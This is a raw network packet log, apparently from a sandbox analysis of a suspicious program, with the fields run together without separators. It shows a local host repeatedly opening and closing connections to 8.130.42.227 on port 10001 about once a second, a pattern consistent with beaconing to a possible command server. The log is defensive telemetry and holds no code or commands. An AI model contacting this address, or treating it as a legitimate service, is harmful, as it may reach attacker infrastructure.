                                                                Oct 1, 2024 09:17:06.606415033 CEST10001497368.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:06.606462002 CEST4973610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:06.709247112 CEST4973610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:06.709574938 CEST4973710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:06.714119911 CEST10001497368.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:06.714389086 CEST10001497378.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:06.714468002 CEST4973710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:06.714562893 CEST4973710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:06.719429970 CEST10001497378.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:07.666435957 CEST10001497378.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:07.666606903 CEST10001497378.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:07.666635990 CEST4973710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:07.666676998 CEST4973710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:07.666786909 CEST4973710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:07.671612978 CEST10001497378.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:07.772169113 CEST4973810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:07.776978016 CEST10001497388.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:07.777076960 CEST4973810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:07.777250051 CEST4973810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:07.782147884 CEST10001497388.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:08.719686985 CEST10001497388.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:08.719805002 CEST10001497388.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:08.719912052 CEST4973810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:08.719912052 CEST4973810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:08.720108032 CEST4973810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:08.724900961 CEST10001497388.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:08.835007906 CEST4973910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:08.839849949 CEST10001497398.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:08.839982033 CEST4973910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:08.840127945 CEST4973910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:08.844886065 CEST10001497398.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:09.789865971 CEST10001497398.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:09.789885044 CEST10001497398.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:09.790000916 CEST4973910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:09.790205956 CEST4973910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:09.794965029 CEST10001497398.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:09.897449017 CEST4974010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:09.902487993 CEST10001497408.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:09.902606964 CEST4974010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:09.902760983 CEST4974010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:09.907567024 CEST10001497408.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:13.878774881 CEST10001497408.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:13.878786087 CEST10001497408.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:13.878848076 CEST4974010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:13.879007101 CEST4974010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:13.883863926 CEST10001497408.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:13.990885973 CEST4974210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:13.995754957 CEST10001497428.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:13.995860100 CEST4974210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:13.995946884 CEST4974210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:14.000722885 CEST10001497428.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:14.961479902 CEST10001497428.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:14.961546898 CEST4974210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:14.961580038 CEST10001497428.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:14.961627960 CEST4974210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:14.961711884 CEST4974210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:14.966480970 CEST10001497428.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:15.069230080 CEST4974410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:15.074184895 CEST10001497448.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:15.074253082 CEST4974410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:15.074542046 CEST4974410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:15.079301119 CEST10001497448.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:16.042283058 CEST10001497448.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:16.042300940 CEST10001497448.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:16.042407990 CEST4974410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:16.042527914 CEST4974410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:16.047377110 CEST10001497448.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:16.148242950 CEST4974710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:16.153232098 CEST10001497478.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:16.154490948 CEST4974710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:16.159049988 CEST4974710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:16.163891077 CEST10001497478.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:17.115231991 CEST10001497478.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:17.115299940 CEST4974710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:17.115315914 CEST10001497478.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:17.115358114 CEST4974710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:17.115461111 CEST4974710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:17.120342016 CEST10001497478.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:17.225208044 CEST4974910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:17.230266094 CEST10001497498.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:17.230365038 CEST4974910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:17.230444908 CEST4974910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:17.235452890 CEST10001497498.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:18.198241949 CEST10001497498.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:18.198313951 CEST4974910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:18.198405027 CEST10001497498.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:18.198473930 CEST4974910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:18.210589886 CEST4974910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:18.216344118 CEST10001497498.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:18.318913937 CEST4975110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:18.323822021 CEST10001497518.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:18.323909044 CEST4975110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:18.323998928 CEST4975110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:18.329031944 CEST10001497518.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:19.277784109 CEST10001497518.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:19.277802944 CEST10001497518.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:19.277882099 CEST4975110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:19.278101921 CEST4975110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:19.282840014 CEST10001497518.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:19.381514072 CEST4975210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:19.387554884 CEST10001497528.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:19.387629986 CEST4975210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:19.387712955 CEST4975210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:19.392453909 CEST10001497528.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:20.348330021 CEST10001497528.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:20.348397017 CEST4975210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:20.348575115 CEST10001497528.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:20.348624945 CEST4975210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:20.459382057 CEST4975210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:20.459774017 CEST4975310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:20.464221001 CEST10001497528.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:20.464574099 CEST10001497538.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:20.464658022 CEST4975310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:20.464828014 CEST4975310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:20.469578981 CEST10001497538.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:21.432746887 CEST10001497538.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:21.432830095 CEST4975310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:21.432873964 CEST10001497538.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:21.432931900 CEST4975310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:21.432991028 CEST4975310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:21.437865019 CEST10001497538.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:21.539292097 CEST4975410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:21.544202089 CEST10001497548.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:21.544270039 CEST4975410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:21.544409037 CEST4975410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:21.549230099 CEST10001497548.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:23.040863037 CEST10001497548.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:23.040887117 CEST10001497548.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:23.040967941 CEST4975410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:23.041234970 CEST4975410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:23.048543930 CEST10001497548.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:23.147340059 CEST4975510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:23.153399944 CEST10001497558.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:23.153520107 CEST4975510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:23.153708935 CEST4975510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:23.158451080 CEST10001497558.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:24.109930038 CEST10001497558.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:24.109947920 CEST10001497558.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:24.109997988 CEST4975510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:24.110033989 CEST4975510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:24.110147953 CEST4975510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:24.114860058 CEST10001497558.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:24.225229979 CEST4975610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:24.230114937 CEST10001497568.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:24.230216980 CEST4975610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:24.230339050 CEST4975610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:24.235117912 CEST10001497568.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:25.186378002 CEST10001497568.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:25.186398029 CEST10001497568.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:25.186486006 CEST4975610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:25.186645031 CEST4975610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:25.191548109 CEST10001497568.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:25.289848089 CEST4975710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:25.294990063 CEST10001497578.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:25.295090914 CEST4975710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:25.295239925 CEST4975710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:25.300307035 CEST10001497578.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:26.245187044 CEST10001497578.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:26.245358944 CEST4975710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:26.246171951 CEST10001497578.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:26.246220112 CEST4975710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:26.365695000 CEST4975710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:26.365906954 CEST4975810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:26.370511055 CEST10001497578.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:26.370677948 CEST10001497588.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:26.370750904 CEST4975810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:26.370908976 CEST4975810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:26.375663996 CEST10001497588.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:27.329121113 CEST10001497588.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:27.329221010 CEST4975810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:27.329310894 CEST10001497588.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:27.329476118 CEST4975810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:27.443898916 CEST4975810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:27.444125891 CEST4975910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:27.448723078 CEST10001497588.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:27.449012995 CEST10001497598.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:27.449141026 CEST4975910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:27.449290991 CEST4975910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:27.454437017 CEST10001497598.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:28.415271044 CEST10001497598.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:28.415337086 CEST10001497598.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:28.415425062 CEST4975910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:28.415543079 CEST4975910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:28.420322895 CEST10001497598.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:28.522336006 CEST4976010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:28.527292967 CEST10001497608.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:28.527431011 CEST4976010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:28.527602911 CEST4976010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:28.532562017 CEST10001497608.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:29.481961012 CEST10001497608.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:29.482062101 CEST4976010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:29.482269049 CEST10001497608.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:29.482328892 CEST4976010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:29.600159883 CEST4976010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:29.600465059 CEST4976110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:29.605010986 CEST10001497608.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:29.605230093 CEST10001497618.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:29.605308056 CEST4976110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:29.605470896 CEST4976110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:29.610219002 CEST10001497618.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:31.127780914 CEST10001497618.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:31.127979040 CEST10001497618.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:31.128010988 CEST4976110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:31.128026009 CEST4976110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:31.128104925 CEST4976110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:31.132939100 CEST10001497618.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:31.240974903 CEST4976210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:31.245786905 CEST10001497628.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:31.245910883 CEST4976210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:31.246192932 CEST4976210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:31.250909090 CEST10001497628.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:32.766760111 CEST10001497628.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:32.766774893 CEST10001497628.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:32.766854048 CEST4976210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:32.767008066 CEST4976210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:32.771811962 CEST10001497628.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:32.888050079 CEST4976310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:32.892951012 CEST10001497638.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:32.893043995 CEST4976310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:32.893191099 CEST4976310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:32.897964954 CEST10001497638.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:33.850868940 CEST10001497638.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:33.850975037 CEST4976310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:33.850986004 CEST10001497638.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:33.851035118 CEST4976310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:33.851136923 CEST4976310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:33.855987072 CEST10001497638.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:33.959744930 CEST4976410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:33.964644909 CEST10001497648.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:33.964739084 CEST4976410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:33.964926004 CEST4976410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:33.969681025 CEST10001497648.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:34.933923960 CEST10001497648.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:34.933944941 CEST10001497648.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:34.934000015 CEST4976410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:34.934039116 CEST4976410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:34.934108019 CEST4976410001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:34.938889980 CEST10001497648.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:35.037739038 CEST4976510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:35.042663097 CEST10001497658.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:35.042762041 CEST4976510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:35.042886019 CEST4976510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:35.047626019 CEST10001497658.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:36.009809971 CEST10001497658.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:36.009835958 CEST10001497658.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:36.009885073 CEST4976510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:36.009919882 CEST4976510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:36.010034084 CEST4976510001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:36.014791965 CEST10001497658.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:36.116811037 CEST4976610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:36.121917963 CEST10001497668.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:36.122036934 CEST4976610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:36.122195005 CEST4976610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:36.127018929 CEST10001497668.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:37.091801882 CEST10001497668.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:37.091877937 CEST4976610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:37.091964006 CEST10001497668.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:37.092063904 CEST4976610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:37.209408998 CEST4976610001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:37.209764004 CEST4976710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:37.214447975 CEST10001497668.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:37.214598894 CEST10001497678.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:37.214673042 CEST4976710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:37.214812040 CEST4976710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:37.219759941 CEST10001497678.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:38.179536104 CEST10001497678.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:38.179703951 CEST10001497678.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:38.179805040 CEST4976710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:38.186352968 CEST4976710001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:38.191201925 CEST10001497678.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:38.303350925 CEST4976810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:38.308233976 CEST10001497688.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:38.308320045 CEST4976810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:38.308451891 CEST4976810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:38.313599110 CEST10001497688.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:39.265749931 CEST10001497688.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:39.265801907 CEST10001497688.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:39.265872002 CEST4976810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:39.265959978 CEST4976810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:39.268843889 CEST4976810001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:39.273631096 CEST10001497688.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:39.405668020 CEST4976910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:39.410708904 CEST10001497698.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:39.410803080 CEST4976910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:39.414067030 CEST4976910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:39.418864965 CEST10001497698.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:40.358573914 CEST10001497698.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:40.358670950 CEST10001497698.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:40.358668089 CEST4976910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:40.358722925 CEST4976910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:40.358845949 CEST4976910001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:40.363558054 CEST10001497698.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:40.475342989 CEST4977010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:40.480288982 CEST10001497708.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:40.480389118 CEST4977010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:40.480554104 CEST4977010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:40.485316992 CEST10001497708.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:41.456600904 CEST10001497708.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:41.456698895 CEST4977010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:41.457010031 CEST10001497708.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:41.457072020 CEST4977010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:41.568712950 CEST4977010001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:41.569022894 CEST4977110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:41.573971033 CEST10001497708.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:41.573985100 CEST10001497718.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:41.574054003 CEST4977110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:41.574184895 CEST4977110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:41.579173088 CEST10001497718.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:42.535255909 CEST10001497718.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:42.535268068 CEST10001497718.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:42.535412073 CEST4977110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:42.535550117 CEST4977110001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:42.540366888 CEST10001497718.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:42.647789955 CEST4977210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:42.655922890 CEST10001497728.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:42.656014919 CEST4977210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:42.656169891 CEST4977210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:42.662200928 CEST10001497728.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:43.632132053 CEST10001497728.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:43.632204056 CEST4977210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:43.632246017 CEST10001497728.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:43.632299900 CEST4977210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:43.632375002 CEST4977210001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:43.639395952 CEST10001497728.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:43.740935087 CEST4977310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:43.746989012 CEST10001497738.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:43.747077942 CEST4977310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:43.747241974 CEST4977310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:43.752389908 CEST10001497738.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:44.697855949 CEST10001497738.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:44.697874069 CEST10001497738.130.42.227192.168.2.4
                                                                Oct 1, 2024 09:17:44.697946072 CEST4977310001192.168.2.48.130.42.227
                                                                Oct 1, 2024 09:17:44.697946072 CEST4977310001192.168.2.48.130.42.227
